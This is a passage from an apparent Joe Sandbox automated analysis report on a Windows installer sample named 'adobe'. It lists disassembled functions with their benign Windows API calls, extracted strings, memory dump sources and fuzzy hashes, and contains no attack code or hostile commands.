                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                                                                                          • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                                                                                          • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ObjectStock$A24620A480A570IconLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3573811560-0
                                                                                                                                                          • Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                                                                                          • Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
                                                                                                                                                          • Opcode Fuzzy Hash: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                                                                                          • Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00462A68 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00462B6C
                                                                                                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,00462C01), ref: 00462B72
                                                                                                                                                          • SetCursor.USER32(?,00462BE9,00007F02,00000000,00462C01), ref: 00462BDC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Cursor$Load
                                                                                                                                                          • String ID: $ $Internal error: Item already expanding
                                                                                                                                                          • API String ID: 1675784387-1948079669
                                                                                                                                                          • Opcode ID: 5deb935177b2749db64ae3d1a30dd8aa8d24bf9f3c0682c3c1b51a54a95d7d69
                                                                                                                                                          • Instruction ID: 311ca96f077e1f8384384c33a5c3f76c8765359b8b10716ccdf0848656b08f70
                                                                                                                                                          • Opcode Fuzzy Hash: 5deb935177b2749db64ae3d1a30dd8aa8d24bf9f3c0682c3c1b51a54a95d7d69
                                                                                                                                                          • Instruction Fuzzy Hash: 4EB19030600A04EFD710DF69C685B9ABBF1FF44304F1484AAE8459B792E7B8ED45CB5A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047586C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 004758C5
                                                                                                                                                          • 73A259E0.USER32(00000000,000000FC,00475820,00000000,00475B04,?,00000000,00475B2E), ref: 004758EC
                                                                                                                                                          • GetACP.KERNEL32(00000000,00475B04,?,00000000,00475B2E), ref: 00475929
                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0047596F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A259ClassInfoMessageSend
                                                                                                                                                          • String ID: COMBOBOX$Inno Setup: Language
                                                                                                                                                          • API String ID: 3217714596-4234151509
                                                                                                                                                          • Opcode ID: 41c5c7ded79787b2e50a7b61f8228310a1637d7bd4ca490c7c1498f7bf0968a7
                                                                                                                                                          • Instruction ID: e49daa43e03c71068c6435758e3380e7ad7aa0efbc45612d2d59fcec593b4e77
                                                                                                                                                          • Opcode Fuzzy Hash: 41c5c7ded79787b2e50a7b61f8228310a1637d7bd4ca490c7c1498f7bf0968a7
                                                                                                                                                          • Instruction Fuzzy Hash: 2E814C34600609DFCB10DF69D985AAEB7F0FB09314F1481BAE809EB362D774AD01CB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00408728 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                                                                                            • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                                                                            • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoLocale$DefaultSystem
                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                          • API String ID: 1044490935-665933166
                                                                                                                                                          • Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                                                                                          • Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
                                                                                                                                                          • Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                                                                                          • Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00411704 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                                                                                          • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                                                                                            • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                                                                                          • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                                                                                            • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                                                                                          • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                                                                          • String ID: ,$?
                                                                                                                                                          • API String ID: 2359071979-2308483597
                                                                                                                                                          • Opcode ID: 2d5d1555a5a769ac59b6b27b0feb9421646c1aec55e735ee341e73b68b6ef4a1
                                                                                                                                                          • Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
                                                                                                                                                          • Opcode Fuzzy Hash: 2d5d1555a5a769ac59b6b27b0feb9421646c1aec55e735ee341e73b68b6ef4a1
                                                                                                                                                          • Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041BE73 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                                                                                          • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1030595962-0
                                                                                                                                                          • Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                                                                                                          • Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
                                                                                                                                                          • Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                                                                                                          • Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041CEE8 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                                                                                          • 73A24620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                                                                                          • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                                                                                          • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                                                                                          • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                                                                                          • 73A18830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Stretch$A18830$A122A24620BitsMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 430401518-0
                                                                                                                                                          • Opcode ID: 82a1241456fd04a0e88beeb3c6f30cae89a111749c76fc10312dff3b31cb2f83
                                                                                                                                                          • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                                                                                          • Opcode Fuzzy Hash: 82a1241456fd04a0e88beeb3c6f30cae89a111749c76fc10312dff3b31cb2f83
                                                                                                                                                          • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004565D4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageA.USER32(00000000,?,?), ref: 00456626
                                                                                                                                                            • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                                                                                            • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                                                                            • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045668D
                                                                                                                                                          • TranslateMessage.USER32(?), ref: 004566AB
                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 004566B4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                                                                                                                          • String ID: [Paused]
                                                                                                                                                          • API String ID: 3047529653-4230553315
                                                                                                                                                          • Opcode ID: 46a11ba5551cbee924e7941ad509293be0bffb06fa5ea0530ea92a8540b83dd1
                                                                                                                                                          • Instruction ID: 5407cbc40fbc40e780d40e1261d4b357eeff69e385f34c28e7b25352baa03612
                                                                                                                                                          • Opcode Fuzzy Hash: 46a11ba5551cbee924e7941ad509293be0bffb06fa5ea0530ea92a8540b83dd1
                                                                                                                                                          • Instruction Fuzzy Hash: 1531F970A042449EDB01DBB5DC41BCE7FB8EB0D314F95407BE800E3292D67C9909CBA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046A764 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCursor.USER32(00000000,0046A8A3), ref: 0046A820
                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0046A82E
                                                                                                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A8A3), ref: 0046A834
                                                                                                                                                          • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A8A3), ref: 0046A83E
                                                                                                                                                          • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A8A3), ref: 0046A844
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Cursor$LoadSleep
                                                                                                                                                          • String ID: CheckPassword
                                                                                                                                                          • API String ID: 4023313301-1302249611
                                                                                                                                                          • Opcode ID: 5e80330db92469ee82be328683be68e89d347e0d68e8a5b36adfc2f5a11641a7
                                                                                                                                                          • Instruction ID: 24335674b3d5fb7c894fb49b41c605e8f494223e4efa829e11476080a36dc80c
                                                                                                                                                          • Opcode Fuzzy Hash: 5e80330db92469ee82be328683be68e89d347e0d68e8a5b36adfc2f5a11641a7
                                                                                                                                                          • Instruction Fuzzy Hash: 1B31A634640604AFD711EB65C989B9E7BE4EF08304F5580B6F800AB392D778AE41CB4A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00458FA4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045905F
                                                                                                                                                          Strings
                                                                                                                                                          • Fusion.dll, xrefs: 00458FFF
                                                                                                                                                          • .NET Framework CreateAssemblyCache function failed, xrefs: 00459082
                                                                                                                                                          • Failed to load .NET Framework DLL "%s", xrefs: 00459044
                                                                                                                                                          • CreateAssemblyCache, xrefs: 00459056
                                                                                                                                                          • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045906A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                          • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                                                                          • API String ID: 190572456-3990135632
                                                                                                                                                          • Opcode ID: 41e9d5eb920c00926123e1a849cae2195e58bd80d0ce90c3564c700ac9e58668
                                                                                                                                                          • Instruction ID: 49fa37d207b3bde44fa74f6dc789ce75dc8756d182da30fc118c482de8ca19ac
                                                                                                                                                          • Opcode Fuzzy Hash: 41e9d5eb920c00926123e1a849cae2195e58bd80d0ce90c3564c700ac9e58668
                                                                                                                                                          • Instruction Fuzzy Hash: 7931D670E04609EBCB00EFA5C88169EB7B8EF45715F40857BE814E7382DB389E088799
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041C158 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                                                                                                          • GetFocus.USER32 ref: 0041C178
                                                                                                                                                          • 73A1A570.USER32(?), ref: 0041C184
                                                                                                                                                          • 73A18830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                                                                                                          • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                                                                                                          • 73A18830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                                                                                                          • 73A1A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A18830$A122A480A570BitsFocusObject
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2231653193-0
                                                                                                                                                          • Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                                                                                                          • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                                                                                                          • Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                                                                                                          • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00418C64 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                                                                                                          • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                                                                                                          • 6F552980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                                                                                            • Part of subcall function 004099C0: 6F54C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                                                                                                          • 6F5BCB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                                                                                                          • 6F5BC740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                                                                                                          • 6F5BCB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                                                                                                          • 6F550860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MetricsSystem$C400C740F550860F552980
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1828538299-0
                                                                                                                                                          • Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                                                                                                          • Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
